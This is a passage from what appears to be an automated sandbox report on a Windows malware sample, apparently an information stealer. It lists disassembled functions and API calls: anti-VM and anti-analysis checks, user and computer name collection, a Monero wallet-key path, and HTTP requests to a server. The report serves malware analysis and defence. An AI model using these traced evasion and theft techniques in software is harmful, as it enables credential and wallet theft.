                                      • Part of subcall function 00C95510: StrStrA.SHLWAPI(00000000,00000000), ref: 00C955B4
                                      • Part of subcall function 00C95510: lstrlen.KERNEL32(00000000), ref: 00C955D3
                                      • Part of subcall function 00C95510: lstrlen.KERNEL32(00000000), ref: 00C955FE
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C959DB
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C95B90
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C95C5C
                                    • Sleep.KERNEL32(0000EA60), ref: 00C95C6B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen$Sleep
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 507064821-2791005934
                                    • Opcode ID: 25e7f350451bddf64d933ccc74e2aff588d4560fb57b46eba3ddf6fa4faff0ac
                                    • Instruction ID: ee11c8fb4701775185b2176ca8430bd273d25186a2cd72d71378a670e87cf0da
                                    • Opcode Fuzzy Hash: 25e7f350451bddf64d933ccc74e2aff588d4560fb57b46eba3ddf6fa4faff0ac
                                    • Instruction Fuzzy Hash: F3E112729102089BCF14FBA0ED6AEED737DAF54300F508568B51667491EF346B08EBD6
                                    Function 00C919F0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1301 c919f0-c91a1d call c9ade0 StrCmpCA 1304 c91a1f-c91a21 ExitProcess 1301->1304 1305 c91a27-c91a41 call c9ade0 1301->1305 1309 c91a44-c91a48 1305->1309 1310 c91a4e-c91a61 1309->1310 1311 c91c12-c91c1d call c9ab10 1309->1311 1313 c91bee-c91c0d 1310->1313 1314 c91a67-c91a6a 1310->1314 1313->1309 1316 c91aad-c91abe StrCmpCA 1314->1316 1317 c91acf-c91ae0 StrCmpCA 1314->1317 1318 c91b41-c91b52 StrCmpCA 1314->1318 1319 c91ba1-c91bb2 StrCmpCA 1314->1319 1320 c91bc0-c91bd1 StrCmpCA 1314->1320 1321 c91b63-c91b74 StrCmpCA 1314->1321 1322 c91b82-c91b93 StrCmpCA 1314->1322 1323 c91a85-c91a94 call c9ab30 1314->1323 1324 c91a99-c91aa8 call c9ab30 1314->1324 1325 c91afd-c91b0e StrCmpCA 1314->1325 1326 c91b1f-c91b30 StrCmpCA 1314->1326 1327 c91bdf-c91be9 call c9ab30 1314->1327 1328 c91a71-c91a80 call c9ab30 1314->1328 1342 c91aca 1316->1342 1343 c91ac0-c91ac3 1316->1343 1344 c91aee-c91af1 1317->1344 1345 c91ae2-c91aec 1317->1345 1350 c91b5e 1318->1350 1351 c91b54-c91b57 1318->1351 1333 c91bbe 1319->1333 1334 c91bb4-c91bb7 1319->1334 1336 c91bdd 1320->1336 1337 c91bd3-c91bd6 1320->1337 1329 c91b80 1321->1329 1330 c91b76-c91b79 1321->1330 1331 c91b9f 1322->1331 1332 c91b95-c91b98 1322->1332 1323->1313 1324->1313 1346 c91b1a 1325->1346 1347 c91b10-c91b13 1325->1347 1348 c91b3c 1326->1348 1349 c91b32-c91b35 1326->1349 1327->1313 1328->1313 1329->1313 1330->1329 1331->1313 1332->1331 1333->1313 1334->1333 1336->1313 1337->1336 1342->1313 1343->1342 1355 c91af8 1344->1355 1345->1355 1346->1313 1347->1346 1348->1313 1349->1348 1350->1313 1351->1350 1355->1313
                                    APIs
                                    • StrCmpCA.SHLWAPI(00000000,block), ref: 00C91A15
                                    • ExitProcess.KERNEL32 ref: 00C91A21
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: d09dcf02b4ee3080755d9451ec6b2e0b19b1bec4e242f6a7161684072ce7ddc6
                                    • Instruction ID: ea401dcf6f88f344c6493aa581840887aa1ab1022e6ed6b49da2bf887db2baa7
                                    • Opcode Fuzzy Hash: d09dcf02b4ee3080755d9451ec6b2e0b19b1bec4e242f6a7161684072ce7ddc6
                                    • Instruction Fuzzy Hash: 825152B5B0420AEFCF04DFA4DA59BAE77BAEF44744F144058F912AB250E770EA40DB91
                                    Function 00C96C90 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00C99BB0: GetProcAddress.KERNEL32(75900000,01520600), ref: 00C99BF1
                                      • Part of subcall function 00C99BB0: GetProcAddress.KERNEL32(75900000,015207C8), ref: 00C99C0A
                                      • Part of subcall function 00C99BB0: GetProcAddress.KERNEL32(75900000,015206F0), ref: 00C99C22
                                      • Part of subcall function 00C99BB0: GetProcAddress.KERNEL32(75900000,01520618), ref: 00C99C3A
                                      • Part of subcall function 00C99BB0: GetProcAddress.KERNEL32(75900000,015207F8), ref: 00C99C53
                                      • Part of subcall function 00C99BB0: GetProcAddress.KERNEL32(75900000,01528BB0), ref: 00C99C6B
                                      • Part of subcall function 00C99BB0: GetProcAddress.KERNEL32(75900000,01516400), ref: 00C99C83
                                      • Part of subcall function 00C99BB0: GetProcAddress.KERNEL32(75900000,01516440), ref: 00C99C9C
                                      • Part of subcall function 00C99BB0: GetProcAddress.KERNEL32(75900000,01520810), ref: 00C99CB4
                                      • Part of subcall function 00C99BB0: GetProcAddress.KERNEL32(75900000,01520678), ref: 00C99CCC
                                      • Part of subcall function 00C99BB0: GetProcAddress.KERNEL32(75900000,015206A8), ref: 00C99CE5
                                      • Part of subcall function 00C99BB0: GetProcAddress.KERNEL32(75900000,01520828), ref: 00C99CFD
                                      • Part of subcall function 00C99BB0: GetProcAddress.KERNEL32(75900000,015162A0), ref: 00C99D15
                                      • Part of subcall function 00C99BB0: GetProcAddress.KERNEL32(75900000,01520840), ref: 00C99D2E
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C811D0: ExitProcess.KERNEL32 ref: 00C81211
                                      • Part of subcall function 00C81160: GetSystemInfo.KERNEL32(?), ref: 00C8116A
                                      • Part of subcall function 00C81160: ExitProcess.KERNEL32 ref: 00C8117E
                                      • Part of subcall function 00C81110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00C8112B
                                      • Part of subcall function 00C81110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00C81132
                                      • Part of subcall function 00C81110: ExitProcess.KERNEL32 ref: 00C81143
                                      • Part of subcall function 00C81220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00C8123E
                                      • Part of subcall function 00C81220: __aulldiv.LIBCMT ref: 00C81258
                                      • Part of subcall function 00C81220: __aulldiv.LIBCMT ref: 00C81266
                                      • Part of subcall function 00C81220: ExitProcess.KERNEL32 ref: 00C81294
                                      • Part of subcall function 00C96A10: GetUserDefaultLangID.KERNEL32 ref: 00C96A14
                                      • Part of subcall function 00C81190: ExitProcess.KERNEL32 ref: 00C811C6
                                      • Part of subcall function 00C979E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C811B7), ref: 00C97A10
                                      • Part of subcall function 00C979E0: RtlAllocateHeap.NTDLL(00000000), ref: 00C97A17
                                      • Part of subcall function 00C979E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C97A2F
                                      • Part of subcall function 00C97A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C97AA0
                                      • Part of subcall function 00C97A70: RtlAllocateHeap.NTDLL(00000000), ref: 00C97AA7
                                      • Part of subcall function 00C97A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00C97ABF
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01528A30,?,00CA10F4,?,00000000,?,00CA10F8,?,00000000,00CA0AF3), ref: 00C96D6A
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C96D88
                                    • CloseHandle.KERNEL32(00000000), ref: 00C96D99
                                    • Sleep.KERNEL32(00001770), ref: 00C96DA4
                                    • CloseHandle.KERNEL32(?,00000000,?,01528A30,?,00CA10F4,?,00000000,?,00CA10F8,?,00000000,00CA0AF3), ref: 00C96DBA
                                    • ExitProcess.KERNEL32 ref: 00C96DC2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                    • String ID:
                                    • API String ID: 2525456742-0
                                    • Opcode ID: bd7108108cbf49a10addb1e55ace8d268fb3cb4147b2e77d2e18dd9247b54827
                                    • Instruction ID: 736061579f2af692a76257332096409aaee8c6e4abf29c1d4fe84ccbdde335e9
                                    • Opcode Fuzzy Hash: bd7108108cbf49a10addb1e55ace8d268fb3cb4147b2e77d2e18dd9247b54827
                                    • Instruction Fuzzy Hash: AD31FC71A04208ABCF04FBF0DC5EAEE7779AF04741F144918F61266191DF706A05A7A6
                                    Function 00C81220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1436 c81220-c81247 call c98b40 GlobalMemoryStatusEx 1439 c81249-c81271 call c9dd30 * 2 1436->1439 1440 c81273-c8127a 1436->1440 1442 c81281-c81285 1439->1442 1440->1442 1444 c8129a-c8129d 1442->1444 1445 c81287 1442->1445 1447 c81289-c81290 1445->1447 1448 c81292-c81294 ExitProcess 1445->1448 1447->1444 1447->1448
                                    APIs
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00C8123E
                                    • __aulldiv.LIBCMT ref: 00C81258
                                    • __aulldiv.LIBCMT ref: 00C81266
                                    • ExitProcess.KERNEL32 ref: 00C81294
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                    • String ID: @
                                    • API String ID: 3404098578-2766056989
                                    • Opcode ID: ce8f771c87ca399674f85e3820771fafb13f9c49ab58427d646832a60552cf64
                                    • Instruction ID: 4d3c1fde18ef1c3a5d1b1678a8875d863c3412e07df9f871b603abf99375df05
                                    • Opcode Fuzzy Hash: ce8f771c87ca399674f85e3820771fafb13f9c49ab58427d646832a60552cf64
                                    • Instruction Fuzzy Hash: C10112B0D44308BBDF10EFE4DD49BADB7BCAB14709F148448EB05B61C0D674554697A9
                                    Function 00C96D93 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1450 c96d93 1451 c96daa 1450->1451 1453 c96d5a-c96d77 call c9ade0 OpenEventA 1451->1453 1454 c96dac-c96dc2 call c96bc0 call c95d60 CloseHandle ExitProcess 1451->1454 1460 c96d79-c96d91 call c9ade0 CreateEventA 1453->1460 1461 c96d95-c96da4 CloseHandle Sleep 1453->1461 1460->1454 1461->1451
                                    APIs
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01528A30,?,00CA10F4,?,00000000,?,00CA10F8,?,00000000,00CA0AF3), ref: 00C96D6A
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C96D88
                                    • CloseHandle.KERNEL32(00000000), ref: 00C96D99
                                    • Sleep.KERNEL32(00001770), ref: 00C96DA4
                                    • CloseHandle.KERNEL32(?,00000000,?,01528A30,?,00CA10F4,?,00000000,?,00CA10F8,?,00000000,00CA0AF3), ref: 00C96DBA
                                    • ExitProcess.KERNEL32 ref: 00C96DC2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                    • String ID:
                                    • API String ID: 941982115-0
                                    • Opcode ID: 9ad9bc0bb670559f25f5807298732b0ec68c4b42b9af224b2786140f70be5f37
                                    • Instruction ID: a739985c1013939c8cfd06ad3c7244faa42341b03df62b8c935d8fb9da0bc1f3
                                    • Opcode Fuzzy Hash: 9ad9bc0bb670559f25f5807298732b0ec68c4b42b9af224b2786140f70be5f37
                                    • Instruction Fuzzy Hash: AAF01231A48709AFEF10BBA0EC0EBBE7774AF04B42F200515B622A51D5DBB05640EAA5
                                    Function 00C84800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C84889
                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00C84899
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1274457161-4251816714
                                    • Opcode ID: 2e41ff5367251f77cec2d1d4aba37df21fcceac36601e0729786880e2de03d2c
                                    • Instruction ID: 1a851d40d4a36b0deebdd1f983bd16e4c7215776254afd98e9d3cca447df6b3f
                                    • Opcode Fuzzy Hash: 2e41ff5367251f77cec2d1d4aba37df21fcceac36601e0729786880e2de03d2c
                                    • Instruction Fuzzy Hash: 6E214FB1D00208ABDF14EFA5EC4AADD7B78FB44321F108625F915A72D0DB706A0ACF91
                                    Function 00C95440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00C9AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00C9AAF6
                                      • Part of subcall function 00C862D0: InternetOpenA.WININET(00CA0DFF,00000001,00000000,00000000,00000000), ref: 00C86331
                                      • Part of subcall function 00C862D0: StrCmpCA.SHLWAPI(?,0152E3C0), ref: 00C86353
                                      • Part of subcall function 00C862D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C86385
                                      • Part of subcall function 00C862D0: HttpOpenRequestA.WININET(00000000,GET,?,0152DA28,00000000,00000000,00400100,00000000), ref: 00C863D5
                                      • Part of subcall function 00C862D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C8640F
                                      • Part of subcall function 00C862D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C86421
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C95478
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                    • String ID: ERROR$ERROR
                                    • API String ID: 3287882509-2579291623
                                    • Opcode ID: f146b2770919ccc8edf60b012399a330583b9eaeef4d62d01ad92fbad09806a7
                                    • Instruction ID: f7bc433d0cf4daa2649d9a25a9b73ac46fa84453e7ac13ade04ff95d4fe5f0af
                                    • Opcode Fuzzy Hash: f146b2770919ccc8edf60b012399a330583b9eaeef4d62d01ad92fbad09806a7
                                    • Instruction Fuzzy Hash: 0B110C31900108ABCF14FFA4DD9AAED7779AF50340F504568F91A5B492EF30AB05EBD5
                                    Function 00C97A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C97AA0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C97AA7
                                    • GetComputerNameA.KERNEL32(?,00000104), ref: 00C97ABF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
